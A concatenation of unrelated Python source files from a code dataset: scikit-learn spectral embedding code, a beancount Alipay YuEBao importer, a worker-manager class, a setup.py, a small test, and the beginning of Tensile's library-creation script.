random_state=None, eigen_tol=0.0,
norm_laplacian=True, drop_first=True):
"""Project the sample on the first eigenvectors of the graph Laplacian.
The adjacency matrix is used to compute a normalized graph Laplacian
whose spectrum (especially the eigenvectors associated to the
smallest eigenvalues) has an interpretation in terms of minimal
number of cuts necessary to split the graph into comparably sized
components.
This embedding can also 'work' even if the ``adjacency`` variable is
not strictly the adjacency matrix of a graph but more generally
an affinity or similarity matrix between samples (for instance the
heat kernel of a euclidean distance matrix or a k-NN matrix).
    However, care must be taken to always make the affinity matrix symmetric
so that the eigenvector decomposition works as expected.
Note : Laplacian Eigenmaps is the actual algorithm implemented here.
Read more in the :ref:`User Guide <spectral_embedding>`.
Parameters
----------
adjacency : {array-like, sparse graph} of shape (n_samples, n_samples)
The adjacency matrix of the graph to embed.
n_components : int, default=8
The dimension of the projection subspace.
eigen_solver : {'arpack', 'lobpcg', 'amg'}, default=None
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities. If None, then ``'arpack'`` is
used.
random_state : int, RandomState instance or None, default=None
Determines the random number generator used for the initialization of
the lobpcg eigenvectors decomposition when ``solver`` == 'amg'. Pass
an int for reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
eigen_tol : float, default=0.0
Stopping criterion for eigendecomposition of the Laplacian matrix
when using arpack eigen_solver.
norm_laplacian : bool, default=True
If True, then compute normalized Laplacian.
drop_first : bool, default=True
Whether to drop the first eigenvector. For spectral embedding, this
should be True as the first eigenvector should be constant vector for
connected graph, but for spectral clustering, this should be kept as
False to retain the first eigenvector.
Returns
-------
embedding : ndarray of shape (n_samples, n_components)
The reduced samples.
Notes
-----
Spectral Embedding (Laplacian Eigenmaps) is most useful when the graph
    has one connected component. If the graph has many components, the first
few eigenvectors will simply uncover the connected components of the graph.
References
----------
* https://en.wikipedia.org/wiki/LOBPCG
* Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method
<NAME>
https://doi.org/10.1137%2FS1064827500366124
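    Examples
    --------
    A minimal sketch (synthetic data; the RBF affinity and the sizes below are
    chosen only for illustration):

    >>> import numpy as np
    >>> from sklearn.metrics.pairwise import rbf_kernel
    >>> X = np.random.RandomState(0).rand(10, 3)
    >>> affinity = rbf_kernel(X)  # symmetric, fully connected affinity
    >>> embedding = spectral_embedding(affinity, n_components=2, random_state=0)
    >>> embedding.shape
    (10, 2)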
"""
adjacency = check_symmetric(adjacency)
try:
from pyamg import smoothed_aggregation_solver
except ImportError as e:
if eigen_solver == "amg":
raise ValueError("The eigen_solver was set to 'amg', but pyamg is "
"not available.") from e
if eigen_solver is None:
eigen_solver = 'arpack'
elif eigen_solver not in ('arpack', 'lobpcg', 'amg'):
raise ValueError("Unknown value for eigen_solver: '%s'."
"Should be 'amg', 'arpack', or 'lobpcg'"
% eigen_solver)
random_state = check_random_state(random_state)
n_nodes = adjacency.shape[0]
# Whether to drop the first eigenvector
if drop_first:
n_components = n_components + 1
if not _graph_is_connected(adjacency):
warnings.warn("Graph is not fully connected, spectral embedding"
" may not work as expected.")
laplacian, dd = csgraph_laplacian(adjacency, normed=norm_laplacian,
return_diag=True)
if (eigen_solver == 'arpack' or eigen_solver != 'lobpcg' and
(not sparse.isspmatrix(laplacian) or n_nodes < 5 * n_components)):
# lobpcg used with eigen_solver='amg' has bugs for low number of nodes
# for details see the source code in scipy:
# https://github.com/scipy/scipy/blob/v0.11.0/scipy/sparse/linalg/eigen
# /lobpcg/lobpcg.py#L237
# or matlab:
# https://www.mathworks.com/matlabcentral/fileexchange/48-lobpcg-m
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# Here we'll use shift-invert mode for fast eigenvalues
# (see https://docs.scipy.org/doc/scipy/reference/tutorial/arpack.html
# for a short explanation of what this means)
# Because the normalized Laplacian has eigenvalues between 0 and 2,
# I - L has eigenvalues between -1 and 1. ARPACK is most efficient
# when finding eigenvalues of largest magnitude (keyword which='LM')
# and when these eigenvalues are very large compared to the rest.
# For very large, very sparse graphs, I - L can have many, many
# eigenvalues very near 1.0. This leads to slow convergence. So
# instead, we'll use ARPACK's shift-invert mode, asking for the
# eigenvalues near 1.0. This effectively spreads-out the spectrum
# near 1.0 and leads to much faster convergence: potentially an
# orders-of-magnitude speedup over simply using keyword which='LA'
# in standard mode.
try:
# We are computing the opposite of the laplacian inplace so as
# to spare a memory allocation of a possibly very large array
laplacian *= -1
v0 = _init_arpack_v0(laplacian.shape[0], random_state)
_, diffusion_map = eigsh(
laplacian, k=n_components, sigma=1.0, which='LM',
tol=eigen_tol, v0=v0)
embedding = diffusion_map.T[n_components::-1]
if norm_laplacian:
embedding = embedding / dd
except RuntimeError:
# When submatrices are exactly singular, an LU decomposition
# in arpack fails. We fallback to lobpcg
eigen_solver = "lobpcg"
# Revert the laplacian to its opposite to have lobpcg work
laplacian *= -1
elif eigen_solver == 'amg':
# Use AMG to get a preconditioner and speed up the eigenvalue
# problem.
if not sparse.issparse(laplacian):
warnings.warn("AMG works better for sparse matrices")
# lobpcg needs double precision floats
laplacian = check_array(laplacian, dtype=np.float64,
accept_sparse=True)
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# The Laplacian matrix is always singular, having at least one zero
# eigenvalue, corresponding to the trivial eigenvector, which is a
# constant. Using a singular matrix for preconditioning may result in
# random failures in LOBPCG and is not supported by the existing
# theory:
# see https://doi.org/10.1007/s10208-015-9297-1
        # Shift the Laplacian so its diagonal is not all ones. The shift
# does change the eigenpairs however, so we'll feed the shifted
# matrix to the solver and afterward set it back to the original.
diag_shift = 1e-5 * sparse.eye(laplacian.shape[0])
laplacian += diag_shift
ml = smoothed_aggregation_solver(check_array(laplacian,
accept_sparse='csr'))
laplacian -= diag_shift
M = ml.aspreconditioner()
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
_, diffusion_map = lobpcg(laplacian, X, M=M, tol=1.e-5,
largest=False)
embedding = diffusion_map.T
if norm_laplacian:
embedding = embedding / dd
if embedding.shape[0] == 1:
raise ValueError
if eigen_solver == "lobpcg":
# lobpcg needs double precision floats
laplacian = check_array(laplacian, dtype=np.float64,
accept_sparse=True)
if n_nodes < 5 * n_components + 1:
# see note above under arpack why lobpcg has problems with small
# number of nodes
# lobpcg will fallback to eigh, so we short circuit it
if sparse.isspmatrix(laplacian):
laplacian = laplacian.toarray()
_, diffusion_map = eigh(laplacian, check_finite=False)
embedding = diffusion_map.T[:n_components]
if norm_laplacian:
embedding = embedding / dd
else:
laplacian = _set_diag(laplacian, 1, norm_laplacian)
# We increase the number of eigenvectors requested, as lobpcg
# doesn't behave well in low dimension
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
_, diffusion_map = lobpcg(laplacian, X, tol=1e-15,
largest=False, maxiter=2000)
embedding = diffusion_map.T[:n_components]
if norm_laplacian:
embedding = embedding / dd
if embedding.shape[0] == 1:
raise ValueError
embedding = _deterministic_vector_sign_flip(embedding)
if drop_first:
return embedding[1:n_components].T
else:
return embedding[:n_components].T
class SpectralEmbedding(BaseEstimator):
"""Spectral embedding for non-linear dimensionality reduction.
Forms an affinity matrix given by the specified function and
applies spectral decomposition to the corresponding graph laplacian.
The resulting transformation is given by the value of the
eigenvectors for each data point.
Note : Laplacian Eigenmaps is the actual algorithm implemented here.
Read more in the :ref:`User Guide <spectral_embedding>`.
Parameters
----------
n_components : int, default=2
The dimension of the projected subspace.
affinity : {'nearest_neighbors', 'rbf', 'precomputed', \
'precomputed_nearest_neighbors'} or callable, \
default='nearest_neighbors'
How to construct the affinity matrix.
- 'nearest_neighbors' : construct the affinity matrix by computing a
graph of nearest neighbors.
- 'rbf' : construct the affinity matrix by computing a radial basis
function (RBF) kernel.
- 'precomputed' : interpret ``X`` as a precomputed affinity matrix.
- 'precomputed_nearest_neighbors' : interpret ``X`` as a sparse graph
of precomputed nearest neighbors, and constructs the affinity matrix
by selecting the ``n_neighbors`` nearest neighbors.
- callable : use passed in function as affinity
the function takes in data matrix (n_samples, n_features)
and return affinity matrix (n_samples, n_samples).
gamma : float, default=None
Kernel coefficient for rbf kernel. If None, gamma will be set to
1/n_features.
random_state : int, RandomState instance or None, default=None
Determines the random number generator used for the initialization of
the lobpcg eigenvectors when ``solver`` == 'amg'. Pass an int for
reproducible results across multiple function calls.
See :term: `Glossary <random_state>`.
eigen_solver : {'arpack', 'lobpcg', 'amg'}, default=None
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems.
If None, then ``'arpack'`` is used.
n_neighbors : int, default=None
Number of nearest neighbors for nearest_neighbors graph building.
If None, n_neighbors will be set to max(n_samples/10, 1).
n_jobs : int, default=None
The number of parallel jobs to run.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
embedding_ : ndarray of shape (n_samples, n_components)
Spectral embedding of the training matrix.
affinity_matrix_ : ndarray of shape (n_samples, n_samples)
Affinity_matrix constructed from samples or precomputed.
n_neighbors_ : int
Number of nearest neighbors effectively used.
Examples
--------
>>> from sklearn.datasets import load_digits
>>> from sklearn.manifold import SpectralEmbedding
>>> X, _ = load_digits(return_X_y=True)
>>> X.shape
(1797, 64)
>>> embedding = SpectralEmbedding(n_components=2)
>>> X_transformed = embedding.fit_transform(X[:100])
>>> X_transformed.shape
(100, 2)
References
----------
- A Tutorial on Spectral Clustering, 2007
<NAME>
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- On Spectral Clustering: Analysis and an algorithm, 2001
<NAME>, <NAME>, <NAME>
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.19.8100
- Normalized cuts and image segmentation, 2000
<NAME>, <NAME>
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
"""
@_deprecate_positional_args
def __init__(self, n_components=2, *, affinity="nearest_neighbors",
gamma=None, random_state=None, eigen_solver=None,
n_neighbors=None, n_jobs=None):
self.n_components = n_components
self.affinity = affinity
self.gamma = gamma
self.random_state = random_state
self.eigen_solver = eigen_solver
self.n_neighbors = n_neighbors
self.n_jobs = n_jobs
def _more_tags(self):
return {'pairwise': self.affinity in ["precomputed",
"precomputed_nearest_neighbors"]}
# TODO: Remove in 1.1
# mypy error: Decorated property not supported
@deprecated("Attribute _pairwise was deprecated in " # type: ignore
"version 0.24 and will be removed in 1.1 (renaming of 0.26).")
@property
def _pairwise(self):
return self.affinity in ["precomputed",
"precomputed_nearest_neighbors"]
def _get_affinity_matrix(self, X, Y=None):
"""Calculate the affinity matrix from data
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : array-like of shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
Y: Ignored
Returns
-------
affinity_matrix of shape (n_samples, n_samples)
"""
if self.affinity == 'precomputed':
self.affinity_matrix_ = X
return self.affinity_matrix_
if self.affinity == 'precomputed_nearest_neighbors':
estimator = NearestNeighbors(n_neighbors=self.n_neighbors,
n_jobs=self.n_jobs,
metric="precomputed").fit(X)
connectivity = estimator.kneighbors_graph(X=X, mode='connectivity')
self.affinity_matrix_ = 0.5 * (connectivity + connectivity.T)
return self.affinity_matrix_
if self.affinity == 'nearest_neighbors':
if sparse.issparse(X):
warnings.warn("Nearest neighbors affinity currently does "
"not support sparse input, falling back to "
"rbf affinity")
self.affinity = "rbf"
else:
self.n_neighbors_ = (self.n_neighbors
if self.n_neighbors is not None
else max(int(X.shape[0] / 10), 1))
self.affinity_matrix_ = kneighbors_graph(X, self.n_neighbors_,
include_self=True,
n_jobs=self.n_jobs)
# currently only symmetric affinity_matrix supported
self.affinity_matrix_ = 0.5 * (self.affinity_matrix_ +
self.affinity_matrix_.T)
return self.affinity_matrix_
if self.affinity == 'rbf':
self.gamma_ = (self.gamma
if self.gamma is not None else 1.0 / X.shape[1])
self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma_)
return self.affinity_matrix_
self.affinity_matrix_ = self.affinity(X)
return self.affinity_matrix_
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : {array-like, sparse matrix}, shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
y : Ignored
Returns
-------
self : object
Returns the instance itself.
"""
X = self._validate_data(X, accept_sparse='csr', ensure_min_samples=2,
estimator=self)
random_state = check_random_state(self.random_state)
if isinstance(self.affinity, str):
if self.affinity not in {"nearest_neighbors", "rbf", "precomputed",
"precomputed_nearest_neighbors"}:
raise ValueError(("%s is not a valid affinity. Expected "
"'precomputed', 'rbf', 'nearest_neighbors' "
"or a callable.") % self.affinity)
elif not callable(self.affinity):
raise ValueError(("'affinity' is expected to be an affinity "
"name or a callable. Got: %s") % self.affinity)
affinity_matrix = self._get_affinity_matrix(X)
self.embedding_ = spectral_embedding(affinity_matrix,
n_components=self.n_components,
eigen_solver=self.eigen_solver,
random_state=random_state)
return self
def fit_transform(self, X, y=None):
"""Fit the model from data in X and transform X.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training vector, where n_samples is the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : {array-like, sparse matrix} of shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
y : Ignored
Returns
-------
X_new : array-like of shape (n_samples, n_components)
"""
self.fit(X)
return self.embedding_
| StarcoderdataPython |
1638317 | import calendar
import csv
import datetime
from datetime import date
from io import StringIO
import xlrd
from beancount.core import data
from beancount.core.data import Note, Transaction
from . import (DictReaderStrip, get_account_by_guess,
get_income_account_by_guess)
from .base import Base
from .deduplicate import Deduplicate
Account余额宝 = 'Assets:Company:Alipay:MonetaryFund'
incomes = ['余额自动转入', '收益', '单次转入']
class YuEBao(Base):
def __init__(self, filename, byte_content, entries, option_map):
if not filename.endswith('xls'):
            raise ValueError('Not YuEBao!')
data = xlrd.open_workbook(filename)
table = data.sheets()[0]
rows_value = table.row_values(0)
if rows_value[0] != '余额宝收支明细查询':
            raise ValueError('Not YuEBao!')
self.book = data
self.table = table
self.deduplicate = Deduplicate(entries, option_map)
def parse(self):
table = self.table
rows = table.nrows
for i in range(5, rows - 4):
row = table.row_values(i)
time = datetime.datetime(
*xlrd.xldate_as_tuple(table.cell_value(rowx=i, colx=0), self.book.datemode))
print("Importing {} price = {} balance = {}".format(
time, row[2], row[3]))
meta = {}
amount = float(row[1])
entry = Transaction(
meta,
date(time.year, time.month, time.day),
'*',
'余额宝',
'余额宝',
data.EMPTY_SET,
data.EMPTY_SET, []
)
if not row[2] in incomes:
amount = -amount
if self.deduplicate.find_duplicate(entry, amount, None, Account余额宝):
print(
"Unknown transaction for {}, check if Alipay transaction exists.".format(time))
self.deduplicate.apply_beans()
return []
| StarcoderdataPython |
1695596 | <filename>tanit/master/core/worker/worker_manager.py
import logging as lg
from datetime import datetime
from threading import RLock
from .worker import WorkerState
from .worker_monitor import WorkerMonitor
_logger = lg.getLogger(__name__)
class WorkerManager(object):
"""Monitor and Maintain workers states.
The WorkerManager monitor the state of workers and maintain the list of active/dead workers.
It is not really part of the execution pipeline, its role is just to keep tack of which
machines are active and fetch their state.
""" # NOQA
def __init__(self, workers_factory):
self.worker_factory = workers_factory
self.workers = []
self.lock = RLock()
# monitor
self.monitor = WorkerMonitor(self)
def start(self):
_logger.info("Stating tanit worker manager.")
self.monitor.start()
_logger.info("Tanit worker manager started.")
def stop(self):
_logger.info("Stopping tanit worker manager.")
self.monitor.stop()
with self.lock:
for wkr in self.list_workers():
wkr.stop()
_logger.info("Tanit worker manager stopped.")
def disable_monitor(self):
self.monitor.heartbeat_check_interval = -1
def get_worker(self, wid):
with self.lock:
for wkr in self.workers:
if wkr.wid == wid:
return wkr
return None
def list_workers(self, state=None):
with self.lock:
if state is None:
return self.workers
else:
return [wkr for wkr in self.list_workers() if wkr.state == state]
def list_active_workers(self):
return self.list_workers(state=WorkerState.ACTIVE)
def register_worker(self, worker):
"""Register a Worker.
Register the worker in the worker manager.
Note: This does not activate the worker.
"""
_logger.info("Registering new Worker [ %s ].", worker.wid)
with self.lock:
remote_worker = self.get_worker(worker.wid)
if remote_worker is not None:
if remote_worker.wid == worker.wid:
_logger.warning("Worker [ %s ] is already registered.", worker.wid)
elif (
remote_worker.address == worker.address
and remote_worker.port == worker.port
and worker.address is not None
and worker.port is not None
):
_logger.warning(
"Worker running on address [ %s ] and port [ %s ] "
+ "is already registered.",
worker.address,
worker.port,
)
elif remote_worker.address == worker.address:
_logger.warning(
"Another Worker [ %s ] is already running on [ %s ].",
worker.wid,
worker.address,
)
else:
remote_worker = self.worker_factory.create_worker(worker)
remote_worker.start()
self.workers.append(remote_worker)
_logger.info("Worker [ %s ] registered.", worker.wid)
def activate_worker(self, wid):
"""Activate a Worker.
Transition worker to state `ACTIVE`.
Worker in any state except `DEACTIVATING` can be activated
"""
_logger.info("Activating Worker [ %s ]", wid)
with self.lock:
remote_worker = self.get_worker(wid)
if remote_worker is not None:
if remote_worker.state == WorkerState.DEACTIVATING:
_logger.error("Cannot activate worker in decommissioning state.")
raise IllegalWorkerStateException(
"Cannot activate worker in decommissioning state."
)
elif remote_worker.state == WorkerState.DEAD:
_logger.warning(
"Worker %s is in %s state, forcing activation"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[WorkerState.DEAD],
)
)
_logger.info(
"Transitioning worker from state %s to %s"
% (
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.ACTIVE],
)
)
remote_worker.state = WorkerState.ACTIVE
else:
raise NoSuchWorkerException("No such worker [ %s ]", wid)
_logger.info("Worker [ %s ] Activated", wid)
def deactivate_worker(self, wid):
"""Deactivate a Worker.
Transition worker to state `DEACTIVATING`.
This does not really decommission the worker but rather schedule it
for decommissioning by the `WorkerDecommissioner`.
Only workers in state `ACTIVE` transition to `DEACTIVATING` state.
"""
_logger.info("Deactivating Worker [ %s ]", wid)
with self.lock:
remote_worker = self.get_worker(wid)
if remote_worker is not None:
if remote_worker.state == WorkerState.ACTIVE:
remote_worker.state = WorkerState.DEACTIVATING
elif remote_worker.state in [
WorkerState.DEACTIVATING,
WorkerState.DEACTIVATED,
]:
_logger.info("Worker [ %s ] already decommissioned.", wid)
elif remote_worker.state == WorkerState.ALIVE:
_logger.info(
"Worker %s in state %s , forcing state %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[WorkerState.ALIVE],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATED],
)
)
remote_worker.state = WorkerState.DEACTIVATED
else:
_logger.error(
"Cannot transition worker %s from state %s to %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATING],
)
)
raise IllegalWorkerStateException(
"Cannot transition worker %s from state %s to %s"
% (
remote_worker.wid,
WorkerState._VALUES_TO_NAMES[remote_worker.state],
WorkerState._VALUES_TO_NAMES[WorkerState.DEACTIVATING],
)
)
else:
raise NoSuchWorkerException("No such worker [ %s ]", wid)
_logger.info("Worker [ %s ] deactivated", wid)
def register_heartbeat(self, worker):
with self.lock:
remote_worker = self.get_worker(worker.wid)
if remote_worker is not None:
remote_worker.last_hear_beat = datetime.now()
if remote_worker.state == WorkerState.DEAD:
remote_worker.state = WorkerState.ALIVE
else:
# register the worker without activating
_logger.info(
"Received heartbeat from unknown worker %s, registering it."
% worker.wid
)
self.register_worker(worker)
class IllegalWorkerStateException(Exception):
pass
class NoSuchWorkerException(Exception):
pass
class AlreadyRegisteredWorkerException(Exception):
pass
| StarcoderdataPython |
3235354 | <filename>docs/hyperpython/hp03.py
from hyperpython import h
from htm import htm
# start
@htm
def html(tag, props, children):
if callable(tag):
return tag()
return h(tag, props, children)
def Heading():
return html('<header>Hello World</header>')
result03 = str(html("""
<{Heading}><//>
"""))
| StarcoderdataPython |
3214099 | <filename>setup.py
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
with open(os.path.join('flagging_site', '__init__.py'), encoding='utf8') as f:
version = re.search(r"__version__ = '(.*?)'", f.read()).group(1)
with open('README.md', encoding='utf8') as f:
readme = f.read()
setup(
name='CRWA Flagging Website',
version=version,
packages=find_packages(),
author='<NAME>',
python_requires='>=3.7.1',
maintainer='Charles River Watershed Association',
license='MIT',
include_package_data=True,
setup_requires=[
'pytest-runner',
],
tests_require=[
'pytest',
'pytest-cov'
],
install_requires=[
'pandas',
'flask',
'jinja2',
'flasgger',
'requests',
'Flask-SQLAlchemy',
'Flask-Admin',
'Flask-BasicAuth',
'py7zr'
],
extras_require={
'windows': ['psycopg2'],
'osx': ['psycopg2-binary']
},
url='https://github.com/codeforboston/flagging',
description='Flagging website for the CRWA',
long_description=readme,
long_description_content_type='text/markdown',
)
| StarcoderdataPython |
95883 | from urllib.parse import urlparse
from django.test import TestCase
# Create your tests here.
from smart_bookmarks.core.utils import url_guid
def test_foo():
guid = url_guid(
"https://stackoverflow.com/questions/3278077/difference-between-getattr-vs-getattribute/3278104?q=alamakota#1234567"
)
print(guid)
| StarcoderdataPython |
3211695 | <reponame>Melykuti/sh-pixel-labelling
# This is the code to define the graphical user interface (GUI) with Tkinter
from datetime import datetime, timedelta
import json
import numpy as np
import os
from PIL import Image, ImageTk
import tkinter as tk
from utils.downloading import SH_TCI_retrieve_successor
from utils.utils import rows_to_pairs, consolidate_name
class ImagePanel(tk.Canvas):
def __init__(self, master, img):
#self.grid(row=0, column=0)
hei, wid = img.shape[0], img.shape[1]
self.width=master.magnification*wid
self.height=master.magnification*hei
tk.Canvas.__init__(self, master, width=self.width, height=self.height)
self.bind("<Button-1>", self.pixelclick)
self.img_orig = img
self.draw_image(self.img_orig, self.master.pxs)
def draw_image(self, img_orig, l):
if len(l)>0:
img = img_orig.copy()
for px in l:
# Black:
#img[px[0], px[1], :] = 0
# Magenta:
#img[px[0], px[1], 0] = 192
#img[px[0], px[1], 1] = 0
#img[px[0], px[1], 2] = 192
img[px[0], px[1], 0] = self.master.colour_for_selection[0]
img[px[0], px[1], 1] = self.master.colour_for_selection[1]
img[px[0], px[1], 2] = self.master.colour_for_selection[2]
else:
img = img_orig.copy()
img = np.kron(img, np.ones((self.master.magnification, self.master.magnification), dtype=np.uint8)[:,:,np.newaxis])
self.imgPIL=ImageTk.PhotoImage(Image.fromarray(img))
self.create_image((0, 0), image=self.imgPIL, anchor='nw', state="normal")
def pixelclick(self, event):
col, row = event.x//self.master.magnification, event.y//self.master.magnification
#print("Clicked at row {0}, column {1}.".format(row, col))
if [row, col] in self.master.pxs:
self.master.pxs.remove([row, col])
else:
self.master.pxs.append([row, col])
self.draw_image(self.img_orig, self.master.pxs)
class ButtonsPanel(tk.Frame):
def __init__(self, master):
        # tk.Frame.__init__ returns None, so there is nothing meaningful to return here.
        tk.Frame.__init__(self, master)
        #self.grid(row=0, column=1, sticky="s")
        self.createWidgets()
def createWidgets(self):
self.skip = tk.Button(self, text="Skip", command=self.skp, padx=5)
self.skip.grid(row=0)
self.savencontinue = tk.Button(self, text="Save & Continue", command=self.snc)
self.savencontinue.grid(row=1)
self.savenquit = tk.Button(self, text="Save & Quit", command=self.snq, padx=2)
self.savenquit.grid(row=2)
self.cancel = tk.Button(self, text="Cancel", command=self.cnq, padx=4)
self.cancel.grid(row=3)
def skp(self):
# active_date, next_date are strings in YYYY-MM-DD format
active_date = self.master.location['date']
print("Skipping " + active_date)
# increment date by 1 day
next_date = datetime.strftime(datetime.strptime(active_date, '%Y-%m-%d') + timedelta(1),
'%Y-%m-%d')
self.master.location['date'] = next_date
#local_location = self.master.location.copy()
#local_location['date'] = next_date
active_date = self.master.create_workspace(self.master, self.master.location)
#active_date = self.master.create_workspace(self.master, local_location)
self.master.location['date'] = active_date
def snc(self):
# active_date, next_date are strings in YYYY-MM-DD format
active_date = self.master.location['date']
print("Saving {0} & Continuing".format(active_date))
self.master.locations_json[active_date] = self.master.location.copy()
self.master.locations_json[active_date]['px'] = self.master.pxs.copy()
self.savetofile()
# increment date by 1 day
next_date = datetime.strftime(datetime.strptime(active_date, '%Y-%m-%d') + timedelta(1), '%Y-%m-%d')
self.master.location['date'] = next_date
active_date = self.master.create_workspace(self.master, self.master.location)
self.master.location['date'] = active_date
def snq(self):
# active_date is a string in YYYY-MM-DD format
active_date = self.master.location['date']
print("Saving {0} & Quitting".format(active_date))
self.master.locations_json[active_date] = self.master.location.copy()
self.master.locations_json[active_date]['px'] = self.master.pxs.copy()
self.savetofile()
self.master.destroy()
def cnq(self):
active_date = self.master.location['date']
print("Cancel. Quitting without saving {0}.".format(active_date))
self.master.destroy()
def savetofile(self):
if not os.path.exists(self.master.output_folder):
os.makedirs(self.master.output_folder)
# save dict of dates and pixels in JSON, named using locations[k]['name']
with open(os.path.join(self.master.output_folder, consolidate_name(self.master.location['name']) + '_' + self.master.level_choice + '_locations.json'), 'w') as openfile:
openfile.write(json.dumps(self.master.locations_json, ensure_ascii=False, indent=0))
# Saving pixel intensity values will be done separately.
class BigFrame(tk.Tk):
def __init__(self, location, INSTANCE_ID, LAYER_NAME_TCI, DATA_SOURCE, magnification, colour_for_selection, output_folder, level_choice):
tk.Tk.__init__(self)
# location['px'] (px) is an np.array of size (2 x nr_of_pixels). self.master.pxs is a list of pairs.
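        # e.g. an array [[r0, r1], [c0, c1]] is assumed to become [[r0, c0], [r1, c1]]
        # (hypothetical illustration of the rows_to_pairs helper, consistent with the
        # comment above).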
self.location = location
self.pxs = rows_to_pairs(location['px'])
self.INSTANCE_ID = INSTANCE_ID
self.LAYER_NAME_TCI = LAYER_NAME_TCI
self.DATA_SOURCE = DATA_SOURCE
self.magnification = magnification
self.colour_for_selection = colour_for_selection
self.output_folder = output_folder
self.level_choice = level_choice
        # Keep widget references before calling grid(), since grid() returns None.
        self.canvas = tk.Canvas(self)
        self.canvas.grid(row=0, column=0)
        self.but = ButtonsPanel(master=self)
        self.but.grid(row=0, column=1)  # , sticky="s"
active_date = self.create_workspace(self, self.location)
self.location['date'] = active_date
self.locations_json = dict()
def create_workspace(self, root, location):
wms_true_color_imgs, available_dates = SH_TCI_retrieve_successor(location, self.INSTANCE_ID, self.LAYER_NAME_TCI, self.DATA_SOURCE)
print('Next available dates: ', [datetime.strftime(ad, '%Y-%m-%d %H:%M:%S') for ad in available_dates])
if len(available_dates)>0:
img = wms_true_color_imgs[0]
#px = location['px']
            self.imgpanel = ImagePanel(root, img)
            self.imgpanel.grid(row=0, column=0)
#self.imgpanel = ImagePanel(root, img, px).grid(row=0, column=0)
#self.imgpanel = ImagePanel(self.canvas, img, px, magnification, root.colour_for_selection).grid(row=0, column=0)
return datetime.strftime(available_dates[0], '%Y-%m-%d')
else:
print('You reached the present.')
#self.but.cnq()
#self.bbb
#self.destroy()
root.destroy()
| StarcoderdataPython |
67416 | <reponame>sunway513/Tensile<gh_stars>0
################################################################################
# Copyright (C) 2016-2019 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
# This script only gets called by CMake
if __name__ == "__main__":
print("This file can no longer be run as a script. Run 'Tensile/bin/TensileCreateLibrary' instead.")
exit(1)
from . import Common
from . import EmbeddedData
from . import Utils
from . import YAMLIO
from .Common import globalParameters, HR, print1, print2, printExit, ensurePath, \
CHeader, CMakeHeader, assignGlobalParameters, ProgressBar, \
listToInitializer
from .KernelWriterAssembly import KernelWriterAssembly
from .KernelWriterSource import KernelWriterSource
from .SolutionStructs import Solution
from .SolutionWriter import SolutionWriter
import argparse
import collections
import itertools
import os
import shutil
import subprocess
import sys
import time
################################################################################
def processKernelSource(kernel, kernelWriterSource, kernelWriterAssembly):
"""
Generate source for a single kernel.
Returns (error, source, header, kernelName).
"""
try:
kernelWriter = kernelWriterSource if kernel["KernelLanguage"] == "Source" else kernelWriterAssembly
# get kernel name
kernelName = kernelWriter.getKernelName(kernel)
#sys.stderr.write("kernel:%s\n"% kernelName)
(err, src) = kernelWriter.getSourceFileString(kernel)
header = kernelWriter.getHeaderFileString(kernel)
except RuntimeError:
return (1, "", "", kernelName)
return (err, src, header, kernelName)
def getAssemblyCodeObjectFiles(kernels, kernelWriterAssembly, outputPath):
destDir = ensurePath(os.path.join(outputPath, 'library'))
asmDir = kernelWriterAssembly.getAssemblyDirectory()
assemblyKernels = list([k for k in kernels if k['KernelLanguage'] == 'Assembly'])
if len(assemblyKernels) == 0:
return []
if globalParameters["MergeFiles"]:
archs = collections.defaultdict(list)
